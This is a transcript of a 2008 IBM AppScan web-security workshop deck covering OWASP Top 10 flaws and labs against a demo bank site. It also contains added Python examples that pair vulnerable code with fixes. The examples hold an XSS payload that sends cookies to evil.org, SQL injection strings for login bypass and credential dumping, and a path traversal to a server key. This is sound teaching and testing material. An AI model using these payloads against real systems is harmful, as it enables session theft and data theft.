© 2007 IBM Corporation IBM Software Group An IBM Proof of Technology Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan Lee Kinsman – Software Architect Alan Kan – Technical Specialist

Upload: alan-kan

Post on 19-Jan-2015


DESCRIPTION

Presented in March 2008 in Wellington, New Zealand.

TRANSCRIPT

Page 1: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101

© 2007 IBM Corporation

IBM Software Group

An IBM Proof of Technology

Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan

Lee Kinsman – Software Architect

Alan Kan – Technical Specialist

Page 2

Agenda

● Introductions & facilities
● The importance of web application security
● Vulnerability Analysis
  Top Attacks Overview
  Hands on Labs 1-2
● Vulnerability Analysis (continued)
  Hands on Labs 3-5
● Automated Vulnerability Analysis
  AppScan Overview
  Hands on Lab 6

Page 3

POT Objectives

By the end of this session you will:

Understand the web application environment

Understand and differentiate between network and application level vulnerabilities

Understand where the vulnerabilities exist

Understand how to leverage AppScan to perform an automated scan for vulnerabilities


Page 5

The Alarming Truth (headline collage)

LexisNexis Data Breach (Washington Post, Feb 17, 2008)
IndiaTimes.com Malware (InformationWeek, Feb 17, 2008)
Hacker breaks into Ecuador's presidential website (Thaindian, Feb 11, 2008)
Hacking Stage 6 (Wikipedia, Feb 9 2007)
Hacker steals Davidson Cos client data (Falls Tribune, Feb 4 2008)
RIAA wiped off the Net (TheRegister, Jan 20 2008)
Chinese hacker steals 18M identities (HackBase.com, Feb 10, 2008)
Mac blogs defaced by XSS (The Register, Feb 17, 2008)
Your Free MacWorld Expo Platinum Pass (CNet, Jan 14, 2008)
Hacker takes down Pennsylvania gvmt (AP, Jan 6, 2008)
Drive-by Pharming in the Wild (Symantec, Jan 21 2008)
Italian Bank hit by XSS fraudsters (Netcraft, Jan 8 2008)
Greek Ministry websites hit by hacker intrusion (eKathimerini, Jan 31, 2008)

Page 6

The Alarming Truth

“Security Intelligence Service director Warren Tucker revealed government department websites had been attacked and information stolen” (nzherald.co.nz, Sep 12, 2007)

“A florist which does all of its business online has had its website targeted by hackers and customers' credit card details have been stolen.” (abc.net.au, Sep 17, 2007)

“Turkish hackers bring down insurer's site… The site was shut down as a precaution and was unavailable for most of today” (SMH.com.au, July 20, 2007)

“Computer hackers have cracked the defences of dozens of top government and business sector internet sites this year, raising concerns about the safety of consumers' financial and personal information.” (SMH.com.au, October 14, 2007)

“Approximately 100 million Americans have been informed that they have suffered a security breach so this problem has reached epidemic proportions.” (Jon Oltsik, Enterprise Strategy Group)

Page 7

Security and compliance risks

Security and compliance integrity risks have serious adverse impacts on a company's identity, customer relations and business results.

● 90% of sites are vulnerable to application attacks
● 80% of organizations will experience an application security incident by 2010
● 64% of CIOs feel that the most significant challenge facing IT organizations is Security, Compliance and Data Protection (Disability Discrimination Act (DDA), Payment Card Industry (PCI) Standards, SOX)
● 75% of the cyber attacks today are at the application level
● Compliance requirements: Payment Card Industry (PCI) Standards, GLBA, HIPAA, FISMA

Page 8

Reality: Security and Spending Are Unbalanced

                    % of Attacks    % of Security Spending
Web Applications        75%                 10%
Network / Server        25%                 90%

75% of All Attacks on Information Security Are Directed to the Web Application Layer
2/3 of All Web Applications Are Vulnerable

Sources: Gartner, Watchfire

Page 9

2006 Vulnerability Statistics (31,373 sites)

Source: http://www.webappsec.org/projects/statistics/

Page 10

The Myth: Our Site Is Safe

“We use network vulnerability scanners”
“We have firewalls in place”
“We audit it once a quarter with pen testers”
“We use SSL encryption”

Page 11

Confusing Network Security Discipline with Application Security

“Application developers and their superiors in IT departments too often mistakenly believe that firewalls, IDS / IPS, and network traffic encryption are sufficient measures for application security. By doing so they are confusing application security with network security”

“None of those technologies hardens application code. All those technologies deal with traffic to applications, not with the applications themselves…. Applications need protection through separate, specific security discipline – application security”

Application Security Testing, Gartner, March 2, 2007

Page 12

High Level Web Application Architecture Review

Client Tier (Browser)  ->  Internet  ->  Firewall  ->  Middle Tier: App Server (Presentation, Business Logic)  ->  Data Tier: Database

The firewall protects the network and SSL protects the transport; the customer's application is deployed on the app server, and the sensitive data is stored in the database.

Page 13

Network Defenses for Web Applications

Perimeter: Firewall
Intrusion Detection System (IDS)
Intrusion Prevention System (IPS)
Application Firewall
Security Information and Event Management (SIEM)

Page 14

Port 80 and Port 443 are open for business….

Page 15

Building Security & Compliance into the SDLC

SDLC: Coding -> Build -> QA -> Security -> Production (developers own coding, build and QA)

● Enable Security to effectively drive remediation into development
● Provide Developers and Testers with expertise on detection and remediation
● Ensure vulnerabilities are addressed before applications are put into production

Page 16

Agenda (section divider; repeats the agenda from Page 2. Next section: Vulnerability Analysis, Top Attacks Overview)

Page 17

Where are the Vulnerabilities?

The stack, bottom to top: Network; Operating System; Database; Applications (Web Server, Web Server Configuration, Third-party Components, Web Applications: Client-Side, Custom, Web Services).

Scanner categories and representative products by layer:
Network: Nessus, ISS, QualysGuard, eEye Retina, Foundstone
Host: Symantec, NetIQ, ISS, CA, Harris STAT
Database: AppSec Inc, NGS Software
App Scanners: Watchfire, SPI Dynamics, Cenzic, NT Objectives, Acunetix WVS
Code Scanning (emerging): Fortify, Ounce Labs, Secure Software, Klocwork, Parasoft

Page 18

Security Defects: Those I manage vs. Those I own

Infrastructure Vulnerabilities or Common Web Vulnerabilities (CWVs) vs. Application Specific Vulnerabilities (ASVs)

Cause of defect: CWVs: insecure application development by 3rd-party software. ASVs: insecure application development in-house.
Location within application: CWVs: 3rd-party technical building blocks or infrastructure (web servers, ...). ASVs: business logic; dynamic data consumed by an application.
Type(s) of exploits: CWVs: known vulnerabilities (patches issued), misconfiguration. ASVs: SQL injection, path tampering, cross-site scripting, suspect content & cookie poisoning.
Detection: CWVs: match signatures & check for known misconfigurations. ASVs: requires application-specific knowledge.
Business risk: CWVs: patch latency is the primary issue. ASVs: requires automated application lifecycle security.
Cost control: CWVs: as secure as the 3rd-party software. ASVs: early detection saves $$$.

Page 19

OWASP and the OWASP Top 10 list

● Open Web Application Security Project – an open organization dedicated to fighting insecure software
● “The OWASP Top Ten document represents a broad consensus about what the most critical web application security flaws are”
● We will use the Top 10 list to cover some of the most common security issues in web applications

Page 20

The OWASP Top 10 list (2007 edition): Application Threat, Negative Impact, Example Impact

Cross-Site Scripting: identity theft, sensitive information leakage, ... Example: hackers can impersonate legitimate users and control their accounts.
Injection Flaws: attacker can manipulate queries to the DB / LDAP / other system. Example: hackers can access backend database information, alter it or steal it.
Malicious File Execution: execute shell commands on the server, up to full control. Example: site modified to transfer all interactions to the hacker.
Insecure Direct Object Reference: attacker can access sensitive files and resources. Example: web application returns the contents of a sensitive file (instead of the harmless one).
Cross-Site Request Forgery: attacker can invoke “blind” actions on web applications, impersonating a trusted user. Example: blind requests to a bank account transfer money to the hacker.
Information Leakage and Improper Error Handling: attackers can gain detailed system information. Example: malicious system reconnaissance may assist in developing further attacks.
Broken Authentication & Session Management: session tokens not guarded or invalidated properly. Example: hacker can “force” a session token on a victim; session tokens can be stolen after logout.
Insecure Cryptographic Storage: weak encryption techniques may lead to broken encryption. Example: confidential information (SSN, credit cards) can be decrypted by malicious users.
Insecure Communications: sensitive info sent unencrypted over an insecure channel. Example: unencrypted credentials “sniffed” and used by the hacker to impersonate the user.
Failure to Restrict URL Access: hacker can access unauthorized resources. Example: hacker can forcefully browse to a page past the login page.

Page 21

1. Cross-Site Scripting (XSS)

● What is it?
  Malicious script echoed back into HTML returned from a trusted site, and run under the trusted site's context
● What are the implications?
  Session tokens stolen (browser security circumvented)
  Complete page content compromised
  Future pages in the browser compromised

Page 22

Cross Site Scripting – The Exploit Process

Parties: Evil.org, User, bank.com

1) Link to bank.com sent to the user via e-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by the browser
4) Script sends the user's cookie and session information without the user's consent or knowledge
5) Evil.org uses the stolen session information to impersonate the user

Page 23

XSS Example I

HTML code:

Page 24

XSS Example II

HTML code:

Page 25

XSS – Details

● Common in search, error pages and returned forms, but can be found on any type of page
● Any input may be echoed back: path, query, POST data, cookie, header, etc.
● Browser technology used to aid the attack: XMLHttpRequest (AJAX), Flash, IFrame…
● Has many variations: XSS in an attribute, DOM-based XSS, etc.

Page 26

Exploiting XSS

● If I can get you to run my JavaScript, I can…
  Steal your cookies for the domain you're browsing
  Track every action you do in that browser from now on
  Redirect you to a phishing site
  Completely modify the content of any page you see on this domain
  Exploit browser vulnerabilities to take over your machine
● XSS is the top security risk today (most exploited)
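The reflected XSS the XSS slides describe, as an added example that is not part of the original deck: a search page that echoes the "q" parameter raw beside the same page with HTML escaping, a cookie-stealing payload of the kind used in Lab 2, and the HttpOnly/Secure cookie flags that keep document.cookie out of reach even when the script does run. The page template, the parameter name and the evil.org collector URL are assumptions made for the example.

```python
# Added example (not from the original deck): reflected XSS in a search page,
# the vulnerable render beside the hardened one. The template, the "q"
# parameter and the evil.org collector URL are illustrative assumptions.
import html
import re
from http.cookies import SimpleCookie

# Attacker's payload as it would arrive in the "q" query parameter: ships
# document.cookie to a host the attacker controls (the Lab 2 pattern).
PAYLOAD = "<script>new Image().src='http://evil.org/c?'+document.cookie</script>"


def render_search_vulnerable(q: str) -> str:
    """Echoes the search term straight into the HTML (the bug)."""
    return f"<h2>Results for: {q}</h2>\n<p>No products matched.</p>"


def render_search_safe(q: str) -> str:
    """Escapes the term for an HTML text context before echoing it."""
    return f"<h2>Results for: {html.escape(q, quote=True)}</h2>\n<p>No products matched.</p>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """True when a literal <script> element survives in the response: the
    browser would execute it in the trusted site's origin."""
    return SCRIPT_TAG.search(page) is not None


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the session token. HttpOnly keeps document.cookie
    from reading it, so even a successful XSS cannot forward it to evil.org;
    Secure keeps it off plaintext HTTP."""
    c = SimpleCookie()
    c["SESSIONID"] = session_id
    c["SESSIONID"]["httponly"] = True
    c["SESSIONID"]["secure"] = True
    c["SESSIONID"]["path"] = "/"
    return c.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))   # <script> survives
    print(render_search_safe(PAYLOAD))         # &lt;script&gt; ... inert text
    print(session_cookie_header("abc123"))
```

Escaping is context-specific: html.escape is right for text between tags and for quoted attribute values, but a value placed inside a script block or a URL needs the encoding for that context instead. HttpOnly limits the damage of cookie theft; it does not stop the script from acting as the user while the page is open.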

Page 27

Agenda (section divider; repeats the agenda from Page 2. Next section: Hands on Labs 1-2)

Page 28

Hands-on Labs

Lab 1 – Profile Web Application

Lab 2 – Steal Cookies

Lab 3 – Login without Credentials

Lab 4 – Steal Usernames and Passwords

Lab 5 – Logging into the Administrative Portal

Lab 6 – Automated Scan of Website

Page 29

Lab 1 Profile Web Application

● The Goal of this lab is to profile the demo.testfire.net application

● Identify the Lab Workbook and where to start (page 5), where to stop (page 11)

Page 30

Lab 2 Steal Cookies

● The goal of the lab is to use a Cross Site Scripting vulnerability on the demo.testfire.net application in order to access cookies in a target user's browser
● Identify the Lab Workbook and where to start (page 12), where to stop (page 18)

Page 31

Agenda (section divider; repeats the agenda from Page 2, with the second item labelled “Security Landscape”. Next section: Vulnerability Analysis (continued))

Page 32

2 - Injection Flaws

● What is it?
  User-supplied data is sent to an interpreter as part of a command, query or data.
● What are the implications?
  SQL Injection – access/modify data in the DB
  SSI Injection – execute commands on the server and access sensitive data
  LDAP Injection – bypass authentication

Page 33

SQL Injection

● User input inserted into a SQL command. Get product details by id:

  Select * from products where id='$REQUEST["id"]';

  Hack: send param id with the value  ' or '1'='1

  Resulting executed SQL:

  Select * from products where id='' or '1'='1'

  All products returned
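The query on this slide, together with the login bypass of Lab 3 and the credential dump of Lab 4, run against an in-memory SQLite database, as an added example that is not part of the original deck. The string-concatenated handlers reproduce the bug; the parameterised ones beside them are the fix. Table names, columns and the sample rows are constructed for the example.

```python
# Added example (not from the original deck): the slide's products lookup,
# plus the login bypass (Lab 3) and the credential dump (Lab 4), against an
# in-memory SQLite database. Tables, columns and rows are constructed here.
import sqlite3

SAMPLE_PRODUCTS = [(1, "Savings account"), (2, "Checking account"), (3, "Credit card")]
SAMPLE_USERS = [("admin", "s3cret"), ("jsmith", "demo1234")]


def open_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_PRODUCTS)
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def product_vulnerable(db, product_id: str) -> list:
    """String concatenation: the slide's select ... where id='$REQUEST["id"]'."""
    sql = f"SELECT id, name FROM products WHERE id='{product_id}'"
    return db.execute(sql).fetchall()


def product_safe(db, product_id: str) -> list:
    """Parameterised query: the value is bound, never parsed as SQL."""
    return db.execute("SELECT id, name FROM products WHERE id=?", (product_id,)).fetchall()


def login_vulnerable(db, username: str, password: str):
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


# Payloads: the slide's tautology, a comment that drops the password check
# (Lab 3), and a UNION that pulls the users table through the product page
# (Lab 4). "--" starts a comment in SQLite's dialect, as in most others.
TAUTOLOGY = "' or '1'='1"
LOGIN_BYPASS = "admin' --"
UNION_DUMP = "x' UNION SELECT username, password FROM users --"

if __name__ == "__main__":
    db = open_db()
    print(product_vulnerable(db, TAUTOLOGY))                # every product
    print(product_safe(db, TAUTOLOGY))                      # []
    print(login_vulnerable(db, LOGIN_BYPASS, "anything"))   # 'admin'
    print(login_safe(db, LOGIN_BYPASS, "anything"))         # None
    print(product_vulnerable(db, UNION_DUMP))               # usernames and passwords
```

The UNION payload works because the product page prints two columns and the attacker can line up two columns of their own; in the safe version the whole string is compared against the id column as a value and matches nothing. Storing plaintext passwords, as the constructed users table does, is the second defect the Lab 4 dump relies on.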

Page 34

SQL Injection Example I

Page 35

SQL Injection Example II

Page 36

SQL Injection Example - Exploit

Page 37

SQL Injection Example - Outcome

Page 38

Injection Flaws (SSI Injection Example): Creating commands from input

Page 39

The return is the private SSL key of the server

Page 40

3 - Malicious File Execution

● What is it?
  Application tricked into executing commands or creating files on the server
● What are the implications?
  Command execution on the server – complete takeover
  Site defacement, including the XSS option

Page 41

Malicious File Execution – Example I

Page 42

Malicious File Execution – Example cont.

Page 43

Malicious File Execution – Example cont.

Page 44

4 - Insecure Direct Object Reference

● What is it?
  Part or all of a resource name (file, table, etc.) is controlled by user input.
● What are the implications?
  Access to sensitive resources
  Information leakage, which aids future hacks
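A file-download handler that illustrates both the Malicious File Execution slides above and this Insecure Direct Object Reference slide, as an added example that is not part of the original deck: the user-supplied name is joined onto a directory, so "../server.key" walks out of it, beside two fixes, a realpath containment check and an opaque id-to-file map. The directory layout, file names and the stand-in key are constructed in a temporary directory for the example.

```python
# Added example (not from the original deck): the download handler that the
# Malicious File Execution and Insecure Direct Object Reference slides hinge
# on, vulnerable and hardened. Paths, names and contents are constructed.
import os
import tempfile

FILES = {"report.txt": "quarterly report", "notes.txt": "public notes"}
SECRET = "-----BEGIN RSA PRIVATE KEY-----\nMIIE...\n"   # stands in for a server key


def build_tree() -> str:
    """Creates <root>/public/<FILES> and <root>/server.key outside public/."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.mkdir(public)
    for name, body in FILES.items():
        with open(os.path.join(public, name), "w") as f:
            f.write(body)
    with open(os.path.join(root, "server.key"), "w") as f:
        f.write(SECRET)
    return root


def download_vulnerable(root: str, name: str) -> str:
    """The bug: the user-supplied name is joined onto the directory, so
    ../server.key walks out of public/."""
    with open(os.path.join(root, "public", name)) as f:
        return f.read()


def download_contained(root: str, name: str) -> str:
    """Resolve the final path (symlinks and .. included) and refuse anything
    that does not land inside public/."""
    base = os.path.realpath(os.path.join(root, "public"))
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes public/: {name!r}")
    with open(target) as f:
        return f.read()


# Indirect reference map: the client only ever sees an opaque id, never a
# filename, so there is no path to tamper with at all.
DOC_IDS = {"d1": "report.txt", "d2": "notes.txt"}


def download_by_id(root: str, doc_id: str) -> str:
    name = DOC_IDS.get(doc_id)
    if name is None:
        raise KeyError(f"unknown document id {doc_id!r}")
    return download_contained(root, name)


if __name__ == "__main__":
    root = build_tree()
    print(download_vulnerable(root, "../server.key")[:30])   # leaks the key
    try:
        download_contained(root, "../server.key")
    except PermissionError as e:
        print("blocked:", e)
    print(download_by_id(root, "d1"))
```

The same containment check applies when the name selects a file to include or execute rather than to download; the id map is the stronger of the two fixes because it also removes the information leak of exposing real file names.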

Page 45

Insecure Direct Object Reference - Example

Page 46

Insecure Direct Object Reference – Example Cont.

Page 47

Insecure Direct Object Reference – Example Cont.

Page 48

5 - Information Leakage and Improper Error Handling

● What is it?
  Unneeded information made available via errors or other means.
● What are the implications?
  Sensitive data exposed
  Web app internals and logic exposed (source code, SQL syntax, exception call stacks, etc.)
  The information aids further hacks

Page 49

Information Leakage - Example

Page 50

Improper Error Handling - Example

Page 51

Information Leakage – Different User/Pass Error
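The two leaks covered by the Information Leakage slides, as an added example that is not part of the original deck: a login that answers differently for an unknown user and for a wrong password, which lets an attacker enumerate valid usernames, and a handler that returns the exception text and stack trace to the browser, each beside the hardened behaviour (one uniform message; an opaque error reference with the detail kept in the server log). The user store and the failing data-layer call are constructed for the example.

```python
# Added example (not from the original deck): username enumeration through
# distinct error messages, and stack traces sent to the client, each beside
# the hardened version. The user store and the data-layer stub are constructed.
import logging
import traceback
import uuid
from typing import Tuple

USERS = {"jsmith": "demo1234"}   # constructed; a real store holds password hashes

log = logging.getLogger("app")


def login_leaky(username: str, password: str) -> str:
    """Different messages for unknown user vs. bad password let an attacker
    confirm usernames before guessing passwords."""
    if username not in USERS:
        return "Unknown username"
    if USERS[username] != password:
        return "Incorrect password"
    return "OK"


def login_uniform(username: str, password: str) -> str:
    """One message for every failure; the detail goes to the server log only."""
    if USERS.get(username) != password:
        log.info("login failed for user=%r", username)
        return "Invalid username or password"
    return "OK"


def query_account(account_id: str) -> dict:
    """Stand-in for a data-layer call that fails on bad input with a message
    that exposes SQL syntax, the way a raw database error would."""
    if not account_id.isdigit():
        raise ValueError(f"syntax error near: SELECT * FROM accounts WHERE id={account_id}")
    return {"id": int(account_id), "balance": 100}


def handler_leaky(account_id: str) -> Tuple[int, str]:
    """Returns the exception text and the stack trace in the HTTP body."""
    try:
        return 200, str(query_account(account_id))
    except Exception:
        return 500, traceback.format_exc()


def handler_hardened(account_id: str) -> Tuple[int, str]:
    """Returns an opaque reference; the trace is logged server-side under it
    so support can still find the failure."""
    try:
        return 200, str(query_account(account_id))
    except Exception:
        ref = uuid.uuid4().hex[:8]
        log.exception("request failed, ref=%s", ref)
        return 500, f"An error occurred. Reference: {ref}"


if __name__ == "__main__":
    print(login_leaky("nobody", "x"), "|", login_leaky("jsmith", "x"))
    print(login_uniform("nobody", "x"), "|", login_uniform("jsmith", "x"))
    print(handler_leaky("1' or 1=1")[1])
    print(handler_hardened("1' or 1=1")[1])
```

A uniform message is necessary but not sufficient: if the unknown-user path returns noticeably faster than the wrong-password path (no hash comparison is run), the timing difference leaks the same information, so the hardened path should do the same amount of work on both branches.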

Page 52

6 - Failure to Restrict URL Access

● What is it?
  Resources that should only be available to authorized users can be accessed by forcefully browsing to them
● What are the implications?
  Sensitive information leaked/modified
  Admin privileges made available to the hacker

Page 53

Failure to Restrict URL Access - Admin User login

/admin/admin.aspx

Page 54

Simple user logs in, forcefully browses to admin page

Page 55

Failure to Restrict URL Access: Privilege Escalation Types

● Access given to completely restricted resources
  Accessing files that shouldn't be served (*.bak, “Copy Of”, *.inc, *.cs, ws_ftp.log, etc.)
● Vertical privilege escalation
  Unknown user accessing pages past the login page
  Simple user accessing admin pages
● Horizontal privilege escalation
  User accessing another user's pages
  Example: bank account user accessing another's account
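A request dispatcher that enforces authorisation on every URL instead of relying on links being hidden, as an added example that is not part of the original deck. It refuses the three escalation types on this slide: an unlisted path such as a stray .bak file is denied by default, forced browsing to /admin/admin.aspx by an anonymous or ordinary user is rejected (vertical), and a user asking for an account they do not own is rejected (horizontal). The route table, roles, users and account numbers are constructed for the example; the paths echo demo.testfire.net's layout but are not taken from it.

```python
# Added example (not from the original deck): per-request authorisation that
# blocks forced browsing and vertical/horizontal escalation. Routes, roles,
# users and account ids are constructed for this example.
from dataclasses import dataclass
from typing import Optional, Tuple

# Minimum role for each path. Anything not listed is denied by default, which
# also covers stray *.bak, *.inc and ws_ftp.log files left in the web root.
ROUTES = {
    "/default.aspx": "anonymous",
    "/login.aspx": "anonymous",
    "/bank/main.aspx": "user",
    "/bank/account.aspx": "user",
    "/admin/admin.aspx": "admin",
}
RANK = {"anonymous": 0, "user": 1, "admin": 2}

# Ownership for the horizontal check: which account ids each user may view.
ACCOUNTS = {"jsmith": {"800001"}, "admin": {"800001", "800002"}}


@dataclass
class Request:
    path: str
    user: Optional[str] = None      # None = not logged in
    role: str = "anonymous"
    params: Optional[dict] = None


def authorize(req: Request) -> Tuple[int, str]:
    required = ROUTES.get(req.path)
    if required is None:
        return 404, "not found"
    if RANK.get(req.role, -1) < RANK[required]:
        # 401 for an anonymous caller, 403 for a logged-in user short on privilege
        return (401, "login required") if req.user is None else (403, "forbidden")
    acct = (req.params or {}).get("account")
    if acct is not None and acct not in ACCOUNTS.get(req.user, set()):
        return 403, "not your account"
    return 200, f"served {req.path}"


if __name__ == "__main__":
    print(authorize(Request("/admin/admin.aspx")))                        # 401
    print(authorize(Request("/admin/admin.aspx", "jsmith", "user")))      # 403
    print(authorize(Request("/bank/account.aspx", "jsmith", "user",
                            {"account": "800002"})))                      # 403
    print(authorize(Request("/bank/account.aspx", "jsmith", "user",
                            {"account": "800001"})))                      # 200
    print(authorize(Request("/login.aspx.bak")))                          # 404
```

The check runs before any handler and keys on the server-side session's role, never on a role or account id supplied by the client; the route table being an allow-list is what turns "forgot to protect a page" into "page does not exist".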

Page 56

Agenda (section divider; repeats the agenda from Page 2. Next section: Hands on Labs 3-5)

Page 57

Hands-on Labs 3-5

Lab 1 – Profile Web Application

Lab 2 – Steal Cookies

Lab 3 – Login without Credentials

Lab 4 – Steal Usernames and Passwords

Lab 5 – Logging into the Administrative Portal

Lab 6 – Automated Scan of Website

Page 58

Lab 3 overview – Login without Credentials

● The goal of the lab is to locate a SQL injection vulnerability and exploit it to log into the demo.testfire.net application without a password
● Identify the Lab Workbook and where to start (page 19), where to stop (page 24)

Page 59

Lab 4 overview – Steal Username and Password

● The Goal of this Lab is to exploit the SQL Injection vulnerability further in order to extract all the usernames and passwords from the demo.testfire.net application

● Identify the Lab Workbook and where to start (page 25), where to stop (page 31)

Page 60

Lab 5 overview – Logging in to Admin Portal

● The Goal of this lab is to use Information Leakage and Direct Access to URLs to find and log into the administrative portal

● Identify the Lab Workbook and where to start (page 32), where to stop (page 36)

Page 61

Agenda (section divider; repeats the agenda from Page 2. Next section: Automated Vulnerability Analysis, AppScan Overview)

Page 62

Watchfire in the Rational Portfolio

SOFTWARE QUALITY SOLUTIONS, spanning Development, Operations and Business

Test and Change Management: Rational RequisitePro (Requirements), Rational ClearQuest (Test, Change, Defects)
Quality Metrics: Project Dashboards, Detailed Test Results, Quality Reports
Test Automation:
  Developer Test: Rational PurifyPlus, Rational Test RealTime
  Functional Test, automated: Rational Functional Tester Plus, Rational Functional Tester, Rational Robot
  Functional Test, manual: Rational Manual Tester
  Performance Test: Rational Performance Tester
  Security and Compliance Test: AppScan; Policy Tester (Interface Compliance; Content Compliance: ADA 508, GLBA, Safe Harbor; Quality, Brand, Search, Inventory)

Page 63: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


AppScan

● What is it?

AppScan is an automated tool used to perform vulnerability assessments on Web Applications

● Why do I need it?

To simplify finding and fixing web application security problems

● What does it do?

Scans web applications, finds security issues and reports on them in an actionable fashion

● Who uses it?

Security Auditors – main users today

QA engineers – when the auditors become the bottleneck

Developers – to find issues as early as possible (most efficient)

Page 64: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


What does AppScan test for?

(Diagram: the layers of the application stack – Network, Operating System, Applications, Database, Web Server, Web Server Configuration, Third-party Components, Web Applications – with AppScan positioned at the Web Applications layer.)

Page 65: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


How does AppScan work?

● Approaches an application as a black-box

● Traverses a web application and builds the site model

● Determines the attack vectors based on the selected Test policy

● Tests by sending modified HTTP requests to the application and examining the HTTP response according to validation rules

(Diagram: AppScan sends an HTTP Request to the Web Application – web servers, application, databases – and examines the HTTP Response.)
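The four-step loop on this slide, modelled as an added illustration in Python (this is not AppScan's code or the presenters' own): a site model, a test policy whose entries pair a mutated parameter value with a validation rule, and a constructed in-process stand-in for the target application (`fake_app`, `TEST_POLICY`, `scan` and the hypothetical `/search.aspx` page are all assumptions made here so the example runs offline).

```python
"""Minimal model of a black-box scan: site model -> test policy ->
mutated HTTP request -> validation rule applied to the response."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Request:
    path: str
    params: Dict[str, str]


@dataclass
class Test:
    """One entry of a test policy: the value substituted into a parameter
    and the rule that decides whether the response indicates a finding."""
    name: str
    payload: str
    validate: Callable[[str], bool]


# Constructed stand-in for the target application (no network involved).
# It echoes the 'q' parameter unescaped and leaks a database error message
# when the quotes in 'q' are unbalanced, so both policy tests can fire.
def fake_app(req: Request) -> str:
    q = req.params.get("q", "")
    if q.count("'") % 2 == 1:
        return "500 ODBC Error: unclosed quotation mark in SQL statement"
    return f"<html><body>Results for {q}</body></html>"


TEST_POLICY: List[Test] = [
    Test("sql-error-disclosure", "'",
         lambda body: re.search(r"(ODBC|SQL) Error", body) is not None),
    Test("reflected-input", "<scan-marker>",
         lambda body: "<scan-marker>" in body),
]


def scan(site_model: List[Request], policy: List[Test],
         send: Callable[[Request], str]) -> List[Tuple[str, str, str]]:
    """For every request and parameter in the site model, send each test's
    mutated request and keep (path, parameter, test) where the rule holds."""
    findings = []
    for req in site_model:
        for param in req.params:
            for test in policy:
                mutated = Request(req.path, {**req.params, param: test.payload})
                if test.validate(send(mutated)):
                    findings.append((req.path, param, test.name))
    return findings


if __name__ == "__main__":
    site = [Request("/search.aspx", {"q": "bank"}),
            Request("/about.aspx", {"lang": "en"})]
    for finding in scan(site, TEST_POLICY, fake_app):
        print(*finding)
```

A real scanner builds the site model by crawling and carries hundreds of such test/rule pairs; the validation rule is what separates a confirmed finding from a request that merely did not error.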

Page 66: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


AppScan Goes Beyond Pointing out Problems

Page 67: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Actionable Fix Recommendations

Page 68: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


AppScan with QA Defect Logger for ClearQuest

Page 69: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


IBM Watchfire on the Net

● Watchfire.com – http://www.watchfire.com: product evaluation download

● AppScan Extensions Framework – http://axf.watchfire.com: PowerPoint Reporter, Pyscan, Defect Logger CQ

● Watchfire Blog – http://blog.watchfire.com/wfblog: expert opinion and Watchfire news

● AppScan Knowledge On Demand (computer-based training): App Security 101, OWASP Top 10, WASC Threat Classifications, Common Attacks

Page 70: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Lab 6 overview

● The goal of this lab is to use AppScan in order to automate the detection of vulnerabilities within a web application

● Identify the Lab Workbook and where to start (page 37), where to stop (page 59)

Page 71: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Session summary

Page 72: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Session summary

Understand the web application environment

Understand and differentiate between network and application level vulnerabilities

Understand where the vulnerabilities exist

Hands on exercises to understand types of vulnerabilities

Hands on exercise to leverage automated scan for vulnerabilities

Page 73: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Next steps

● Further discussions with your IBM Rational Account Representative and/or an AppScan product expert: Jono Massy-Greene ([email protected]), Alan Kan ([email protected])

● Schedule a Security Business Value Assessment

● Schedule a Vulnerability Assessment of one of your applications

Page 74: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Register today with discount code “HDDE” and receive $100 off your registration fee!

Visit www.ibm.com/rational/rsdc for more information

IBM Rational Software Development Conference 2008, June 1 – 5, 2008; Orlando, Florida

CONFERENCE HIGHLIGHTS:

Over 3,000 customers and partners

Over 300 sessions – 14 tracks

Executive Summit 2008

3- and 5-hour Technical Workshops

Access to IBM Engineers and IBM Research

Keynotes with industry-leading experts

Exhibit hall showcasing complimentary product and services

Unlimited networking opportunities

IBM Solution Center

Interactive Birds-of-a-Feather Sessions

Page 75: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


Page 76: Discovering the Value of Verifying Web Application Security Using IBM Rational AppScan aka Hacking 101


We appreciate your feedback. Please fill out the survey form in order to improve this educational event.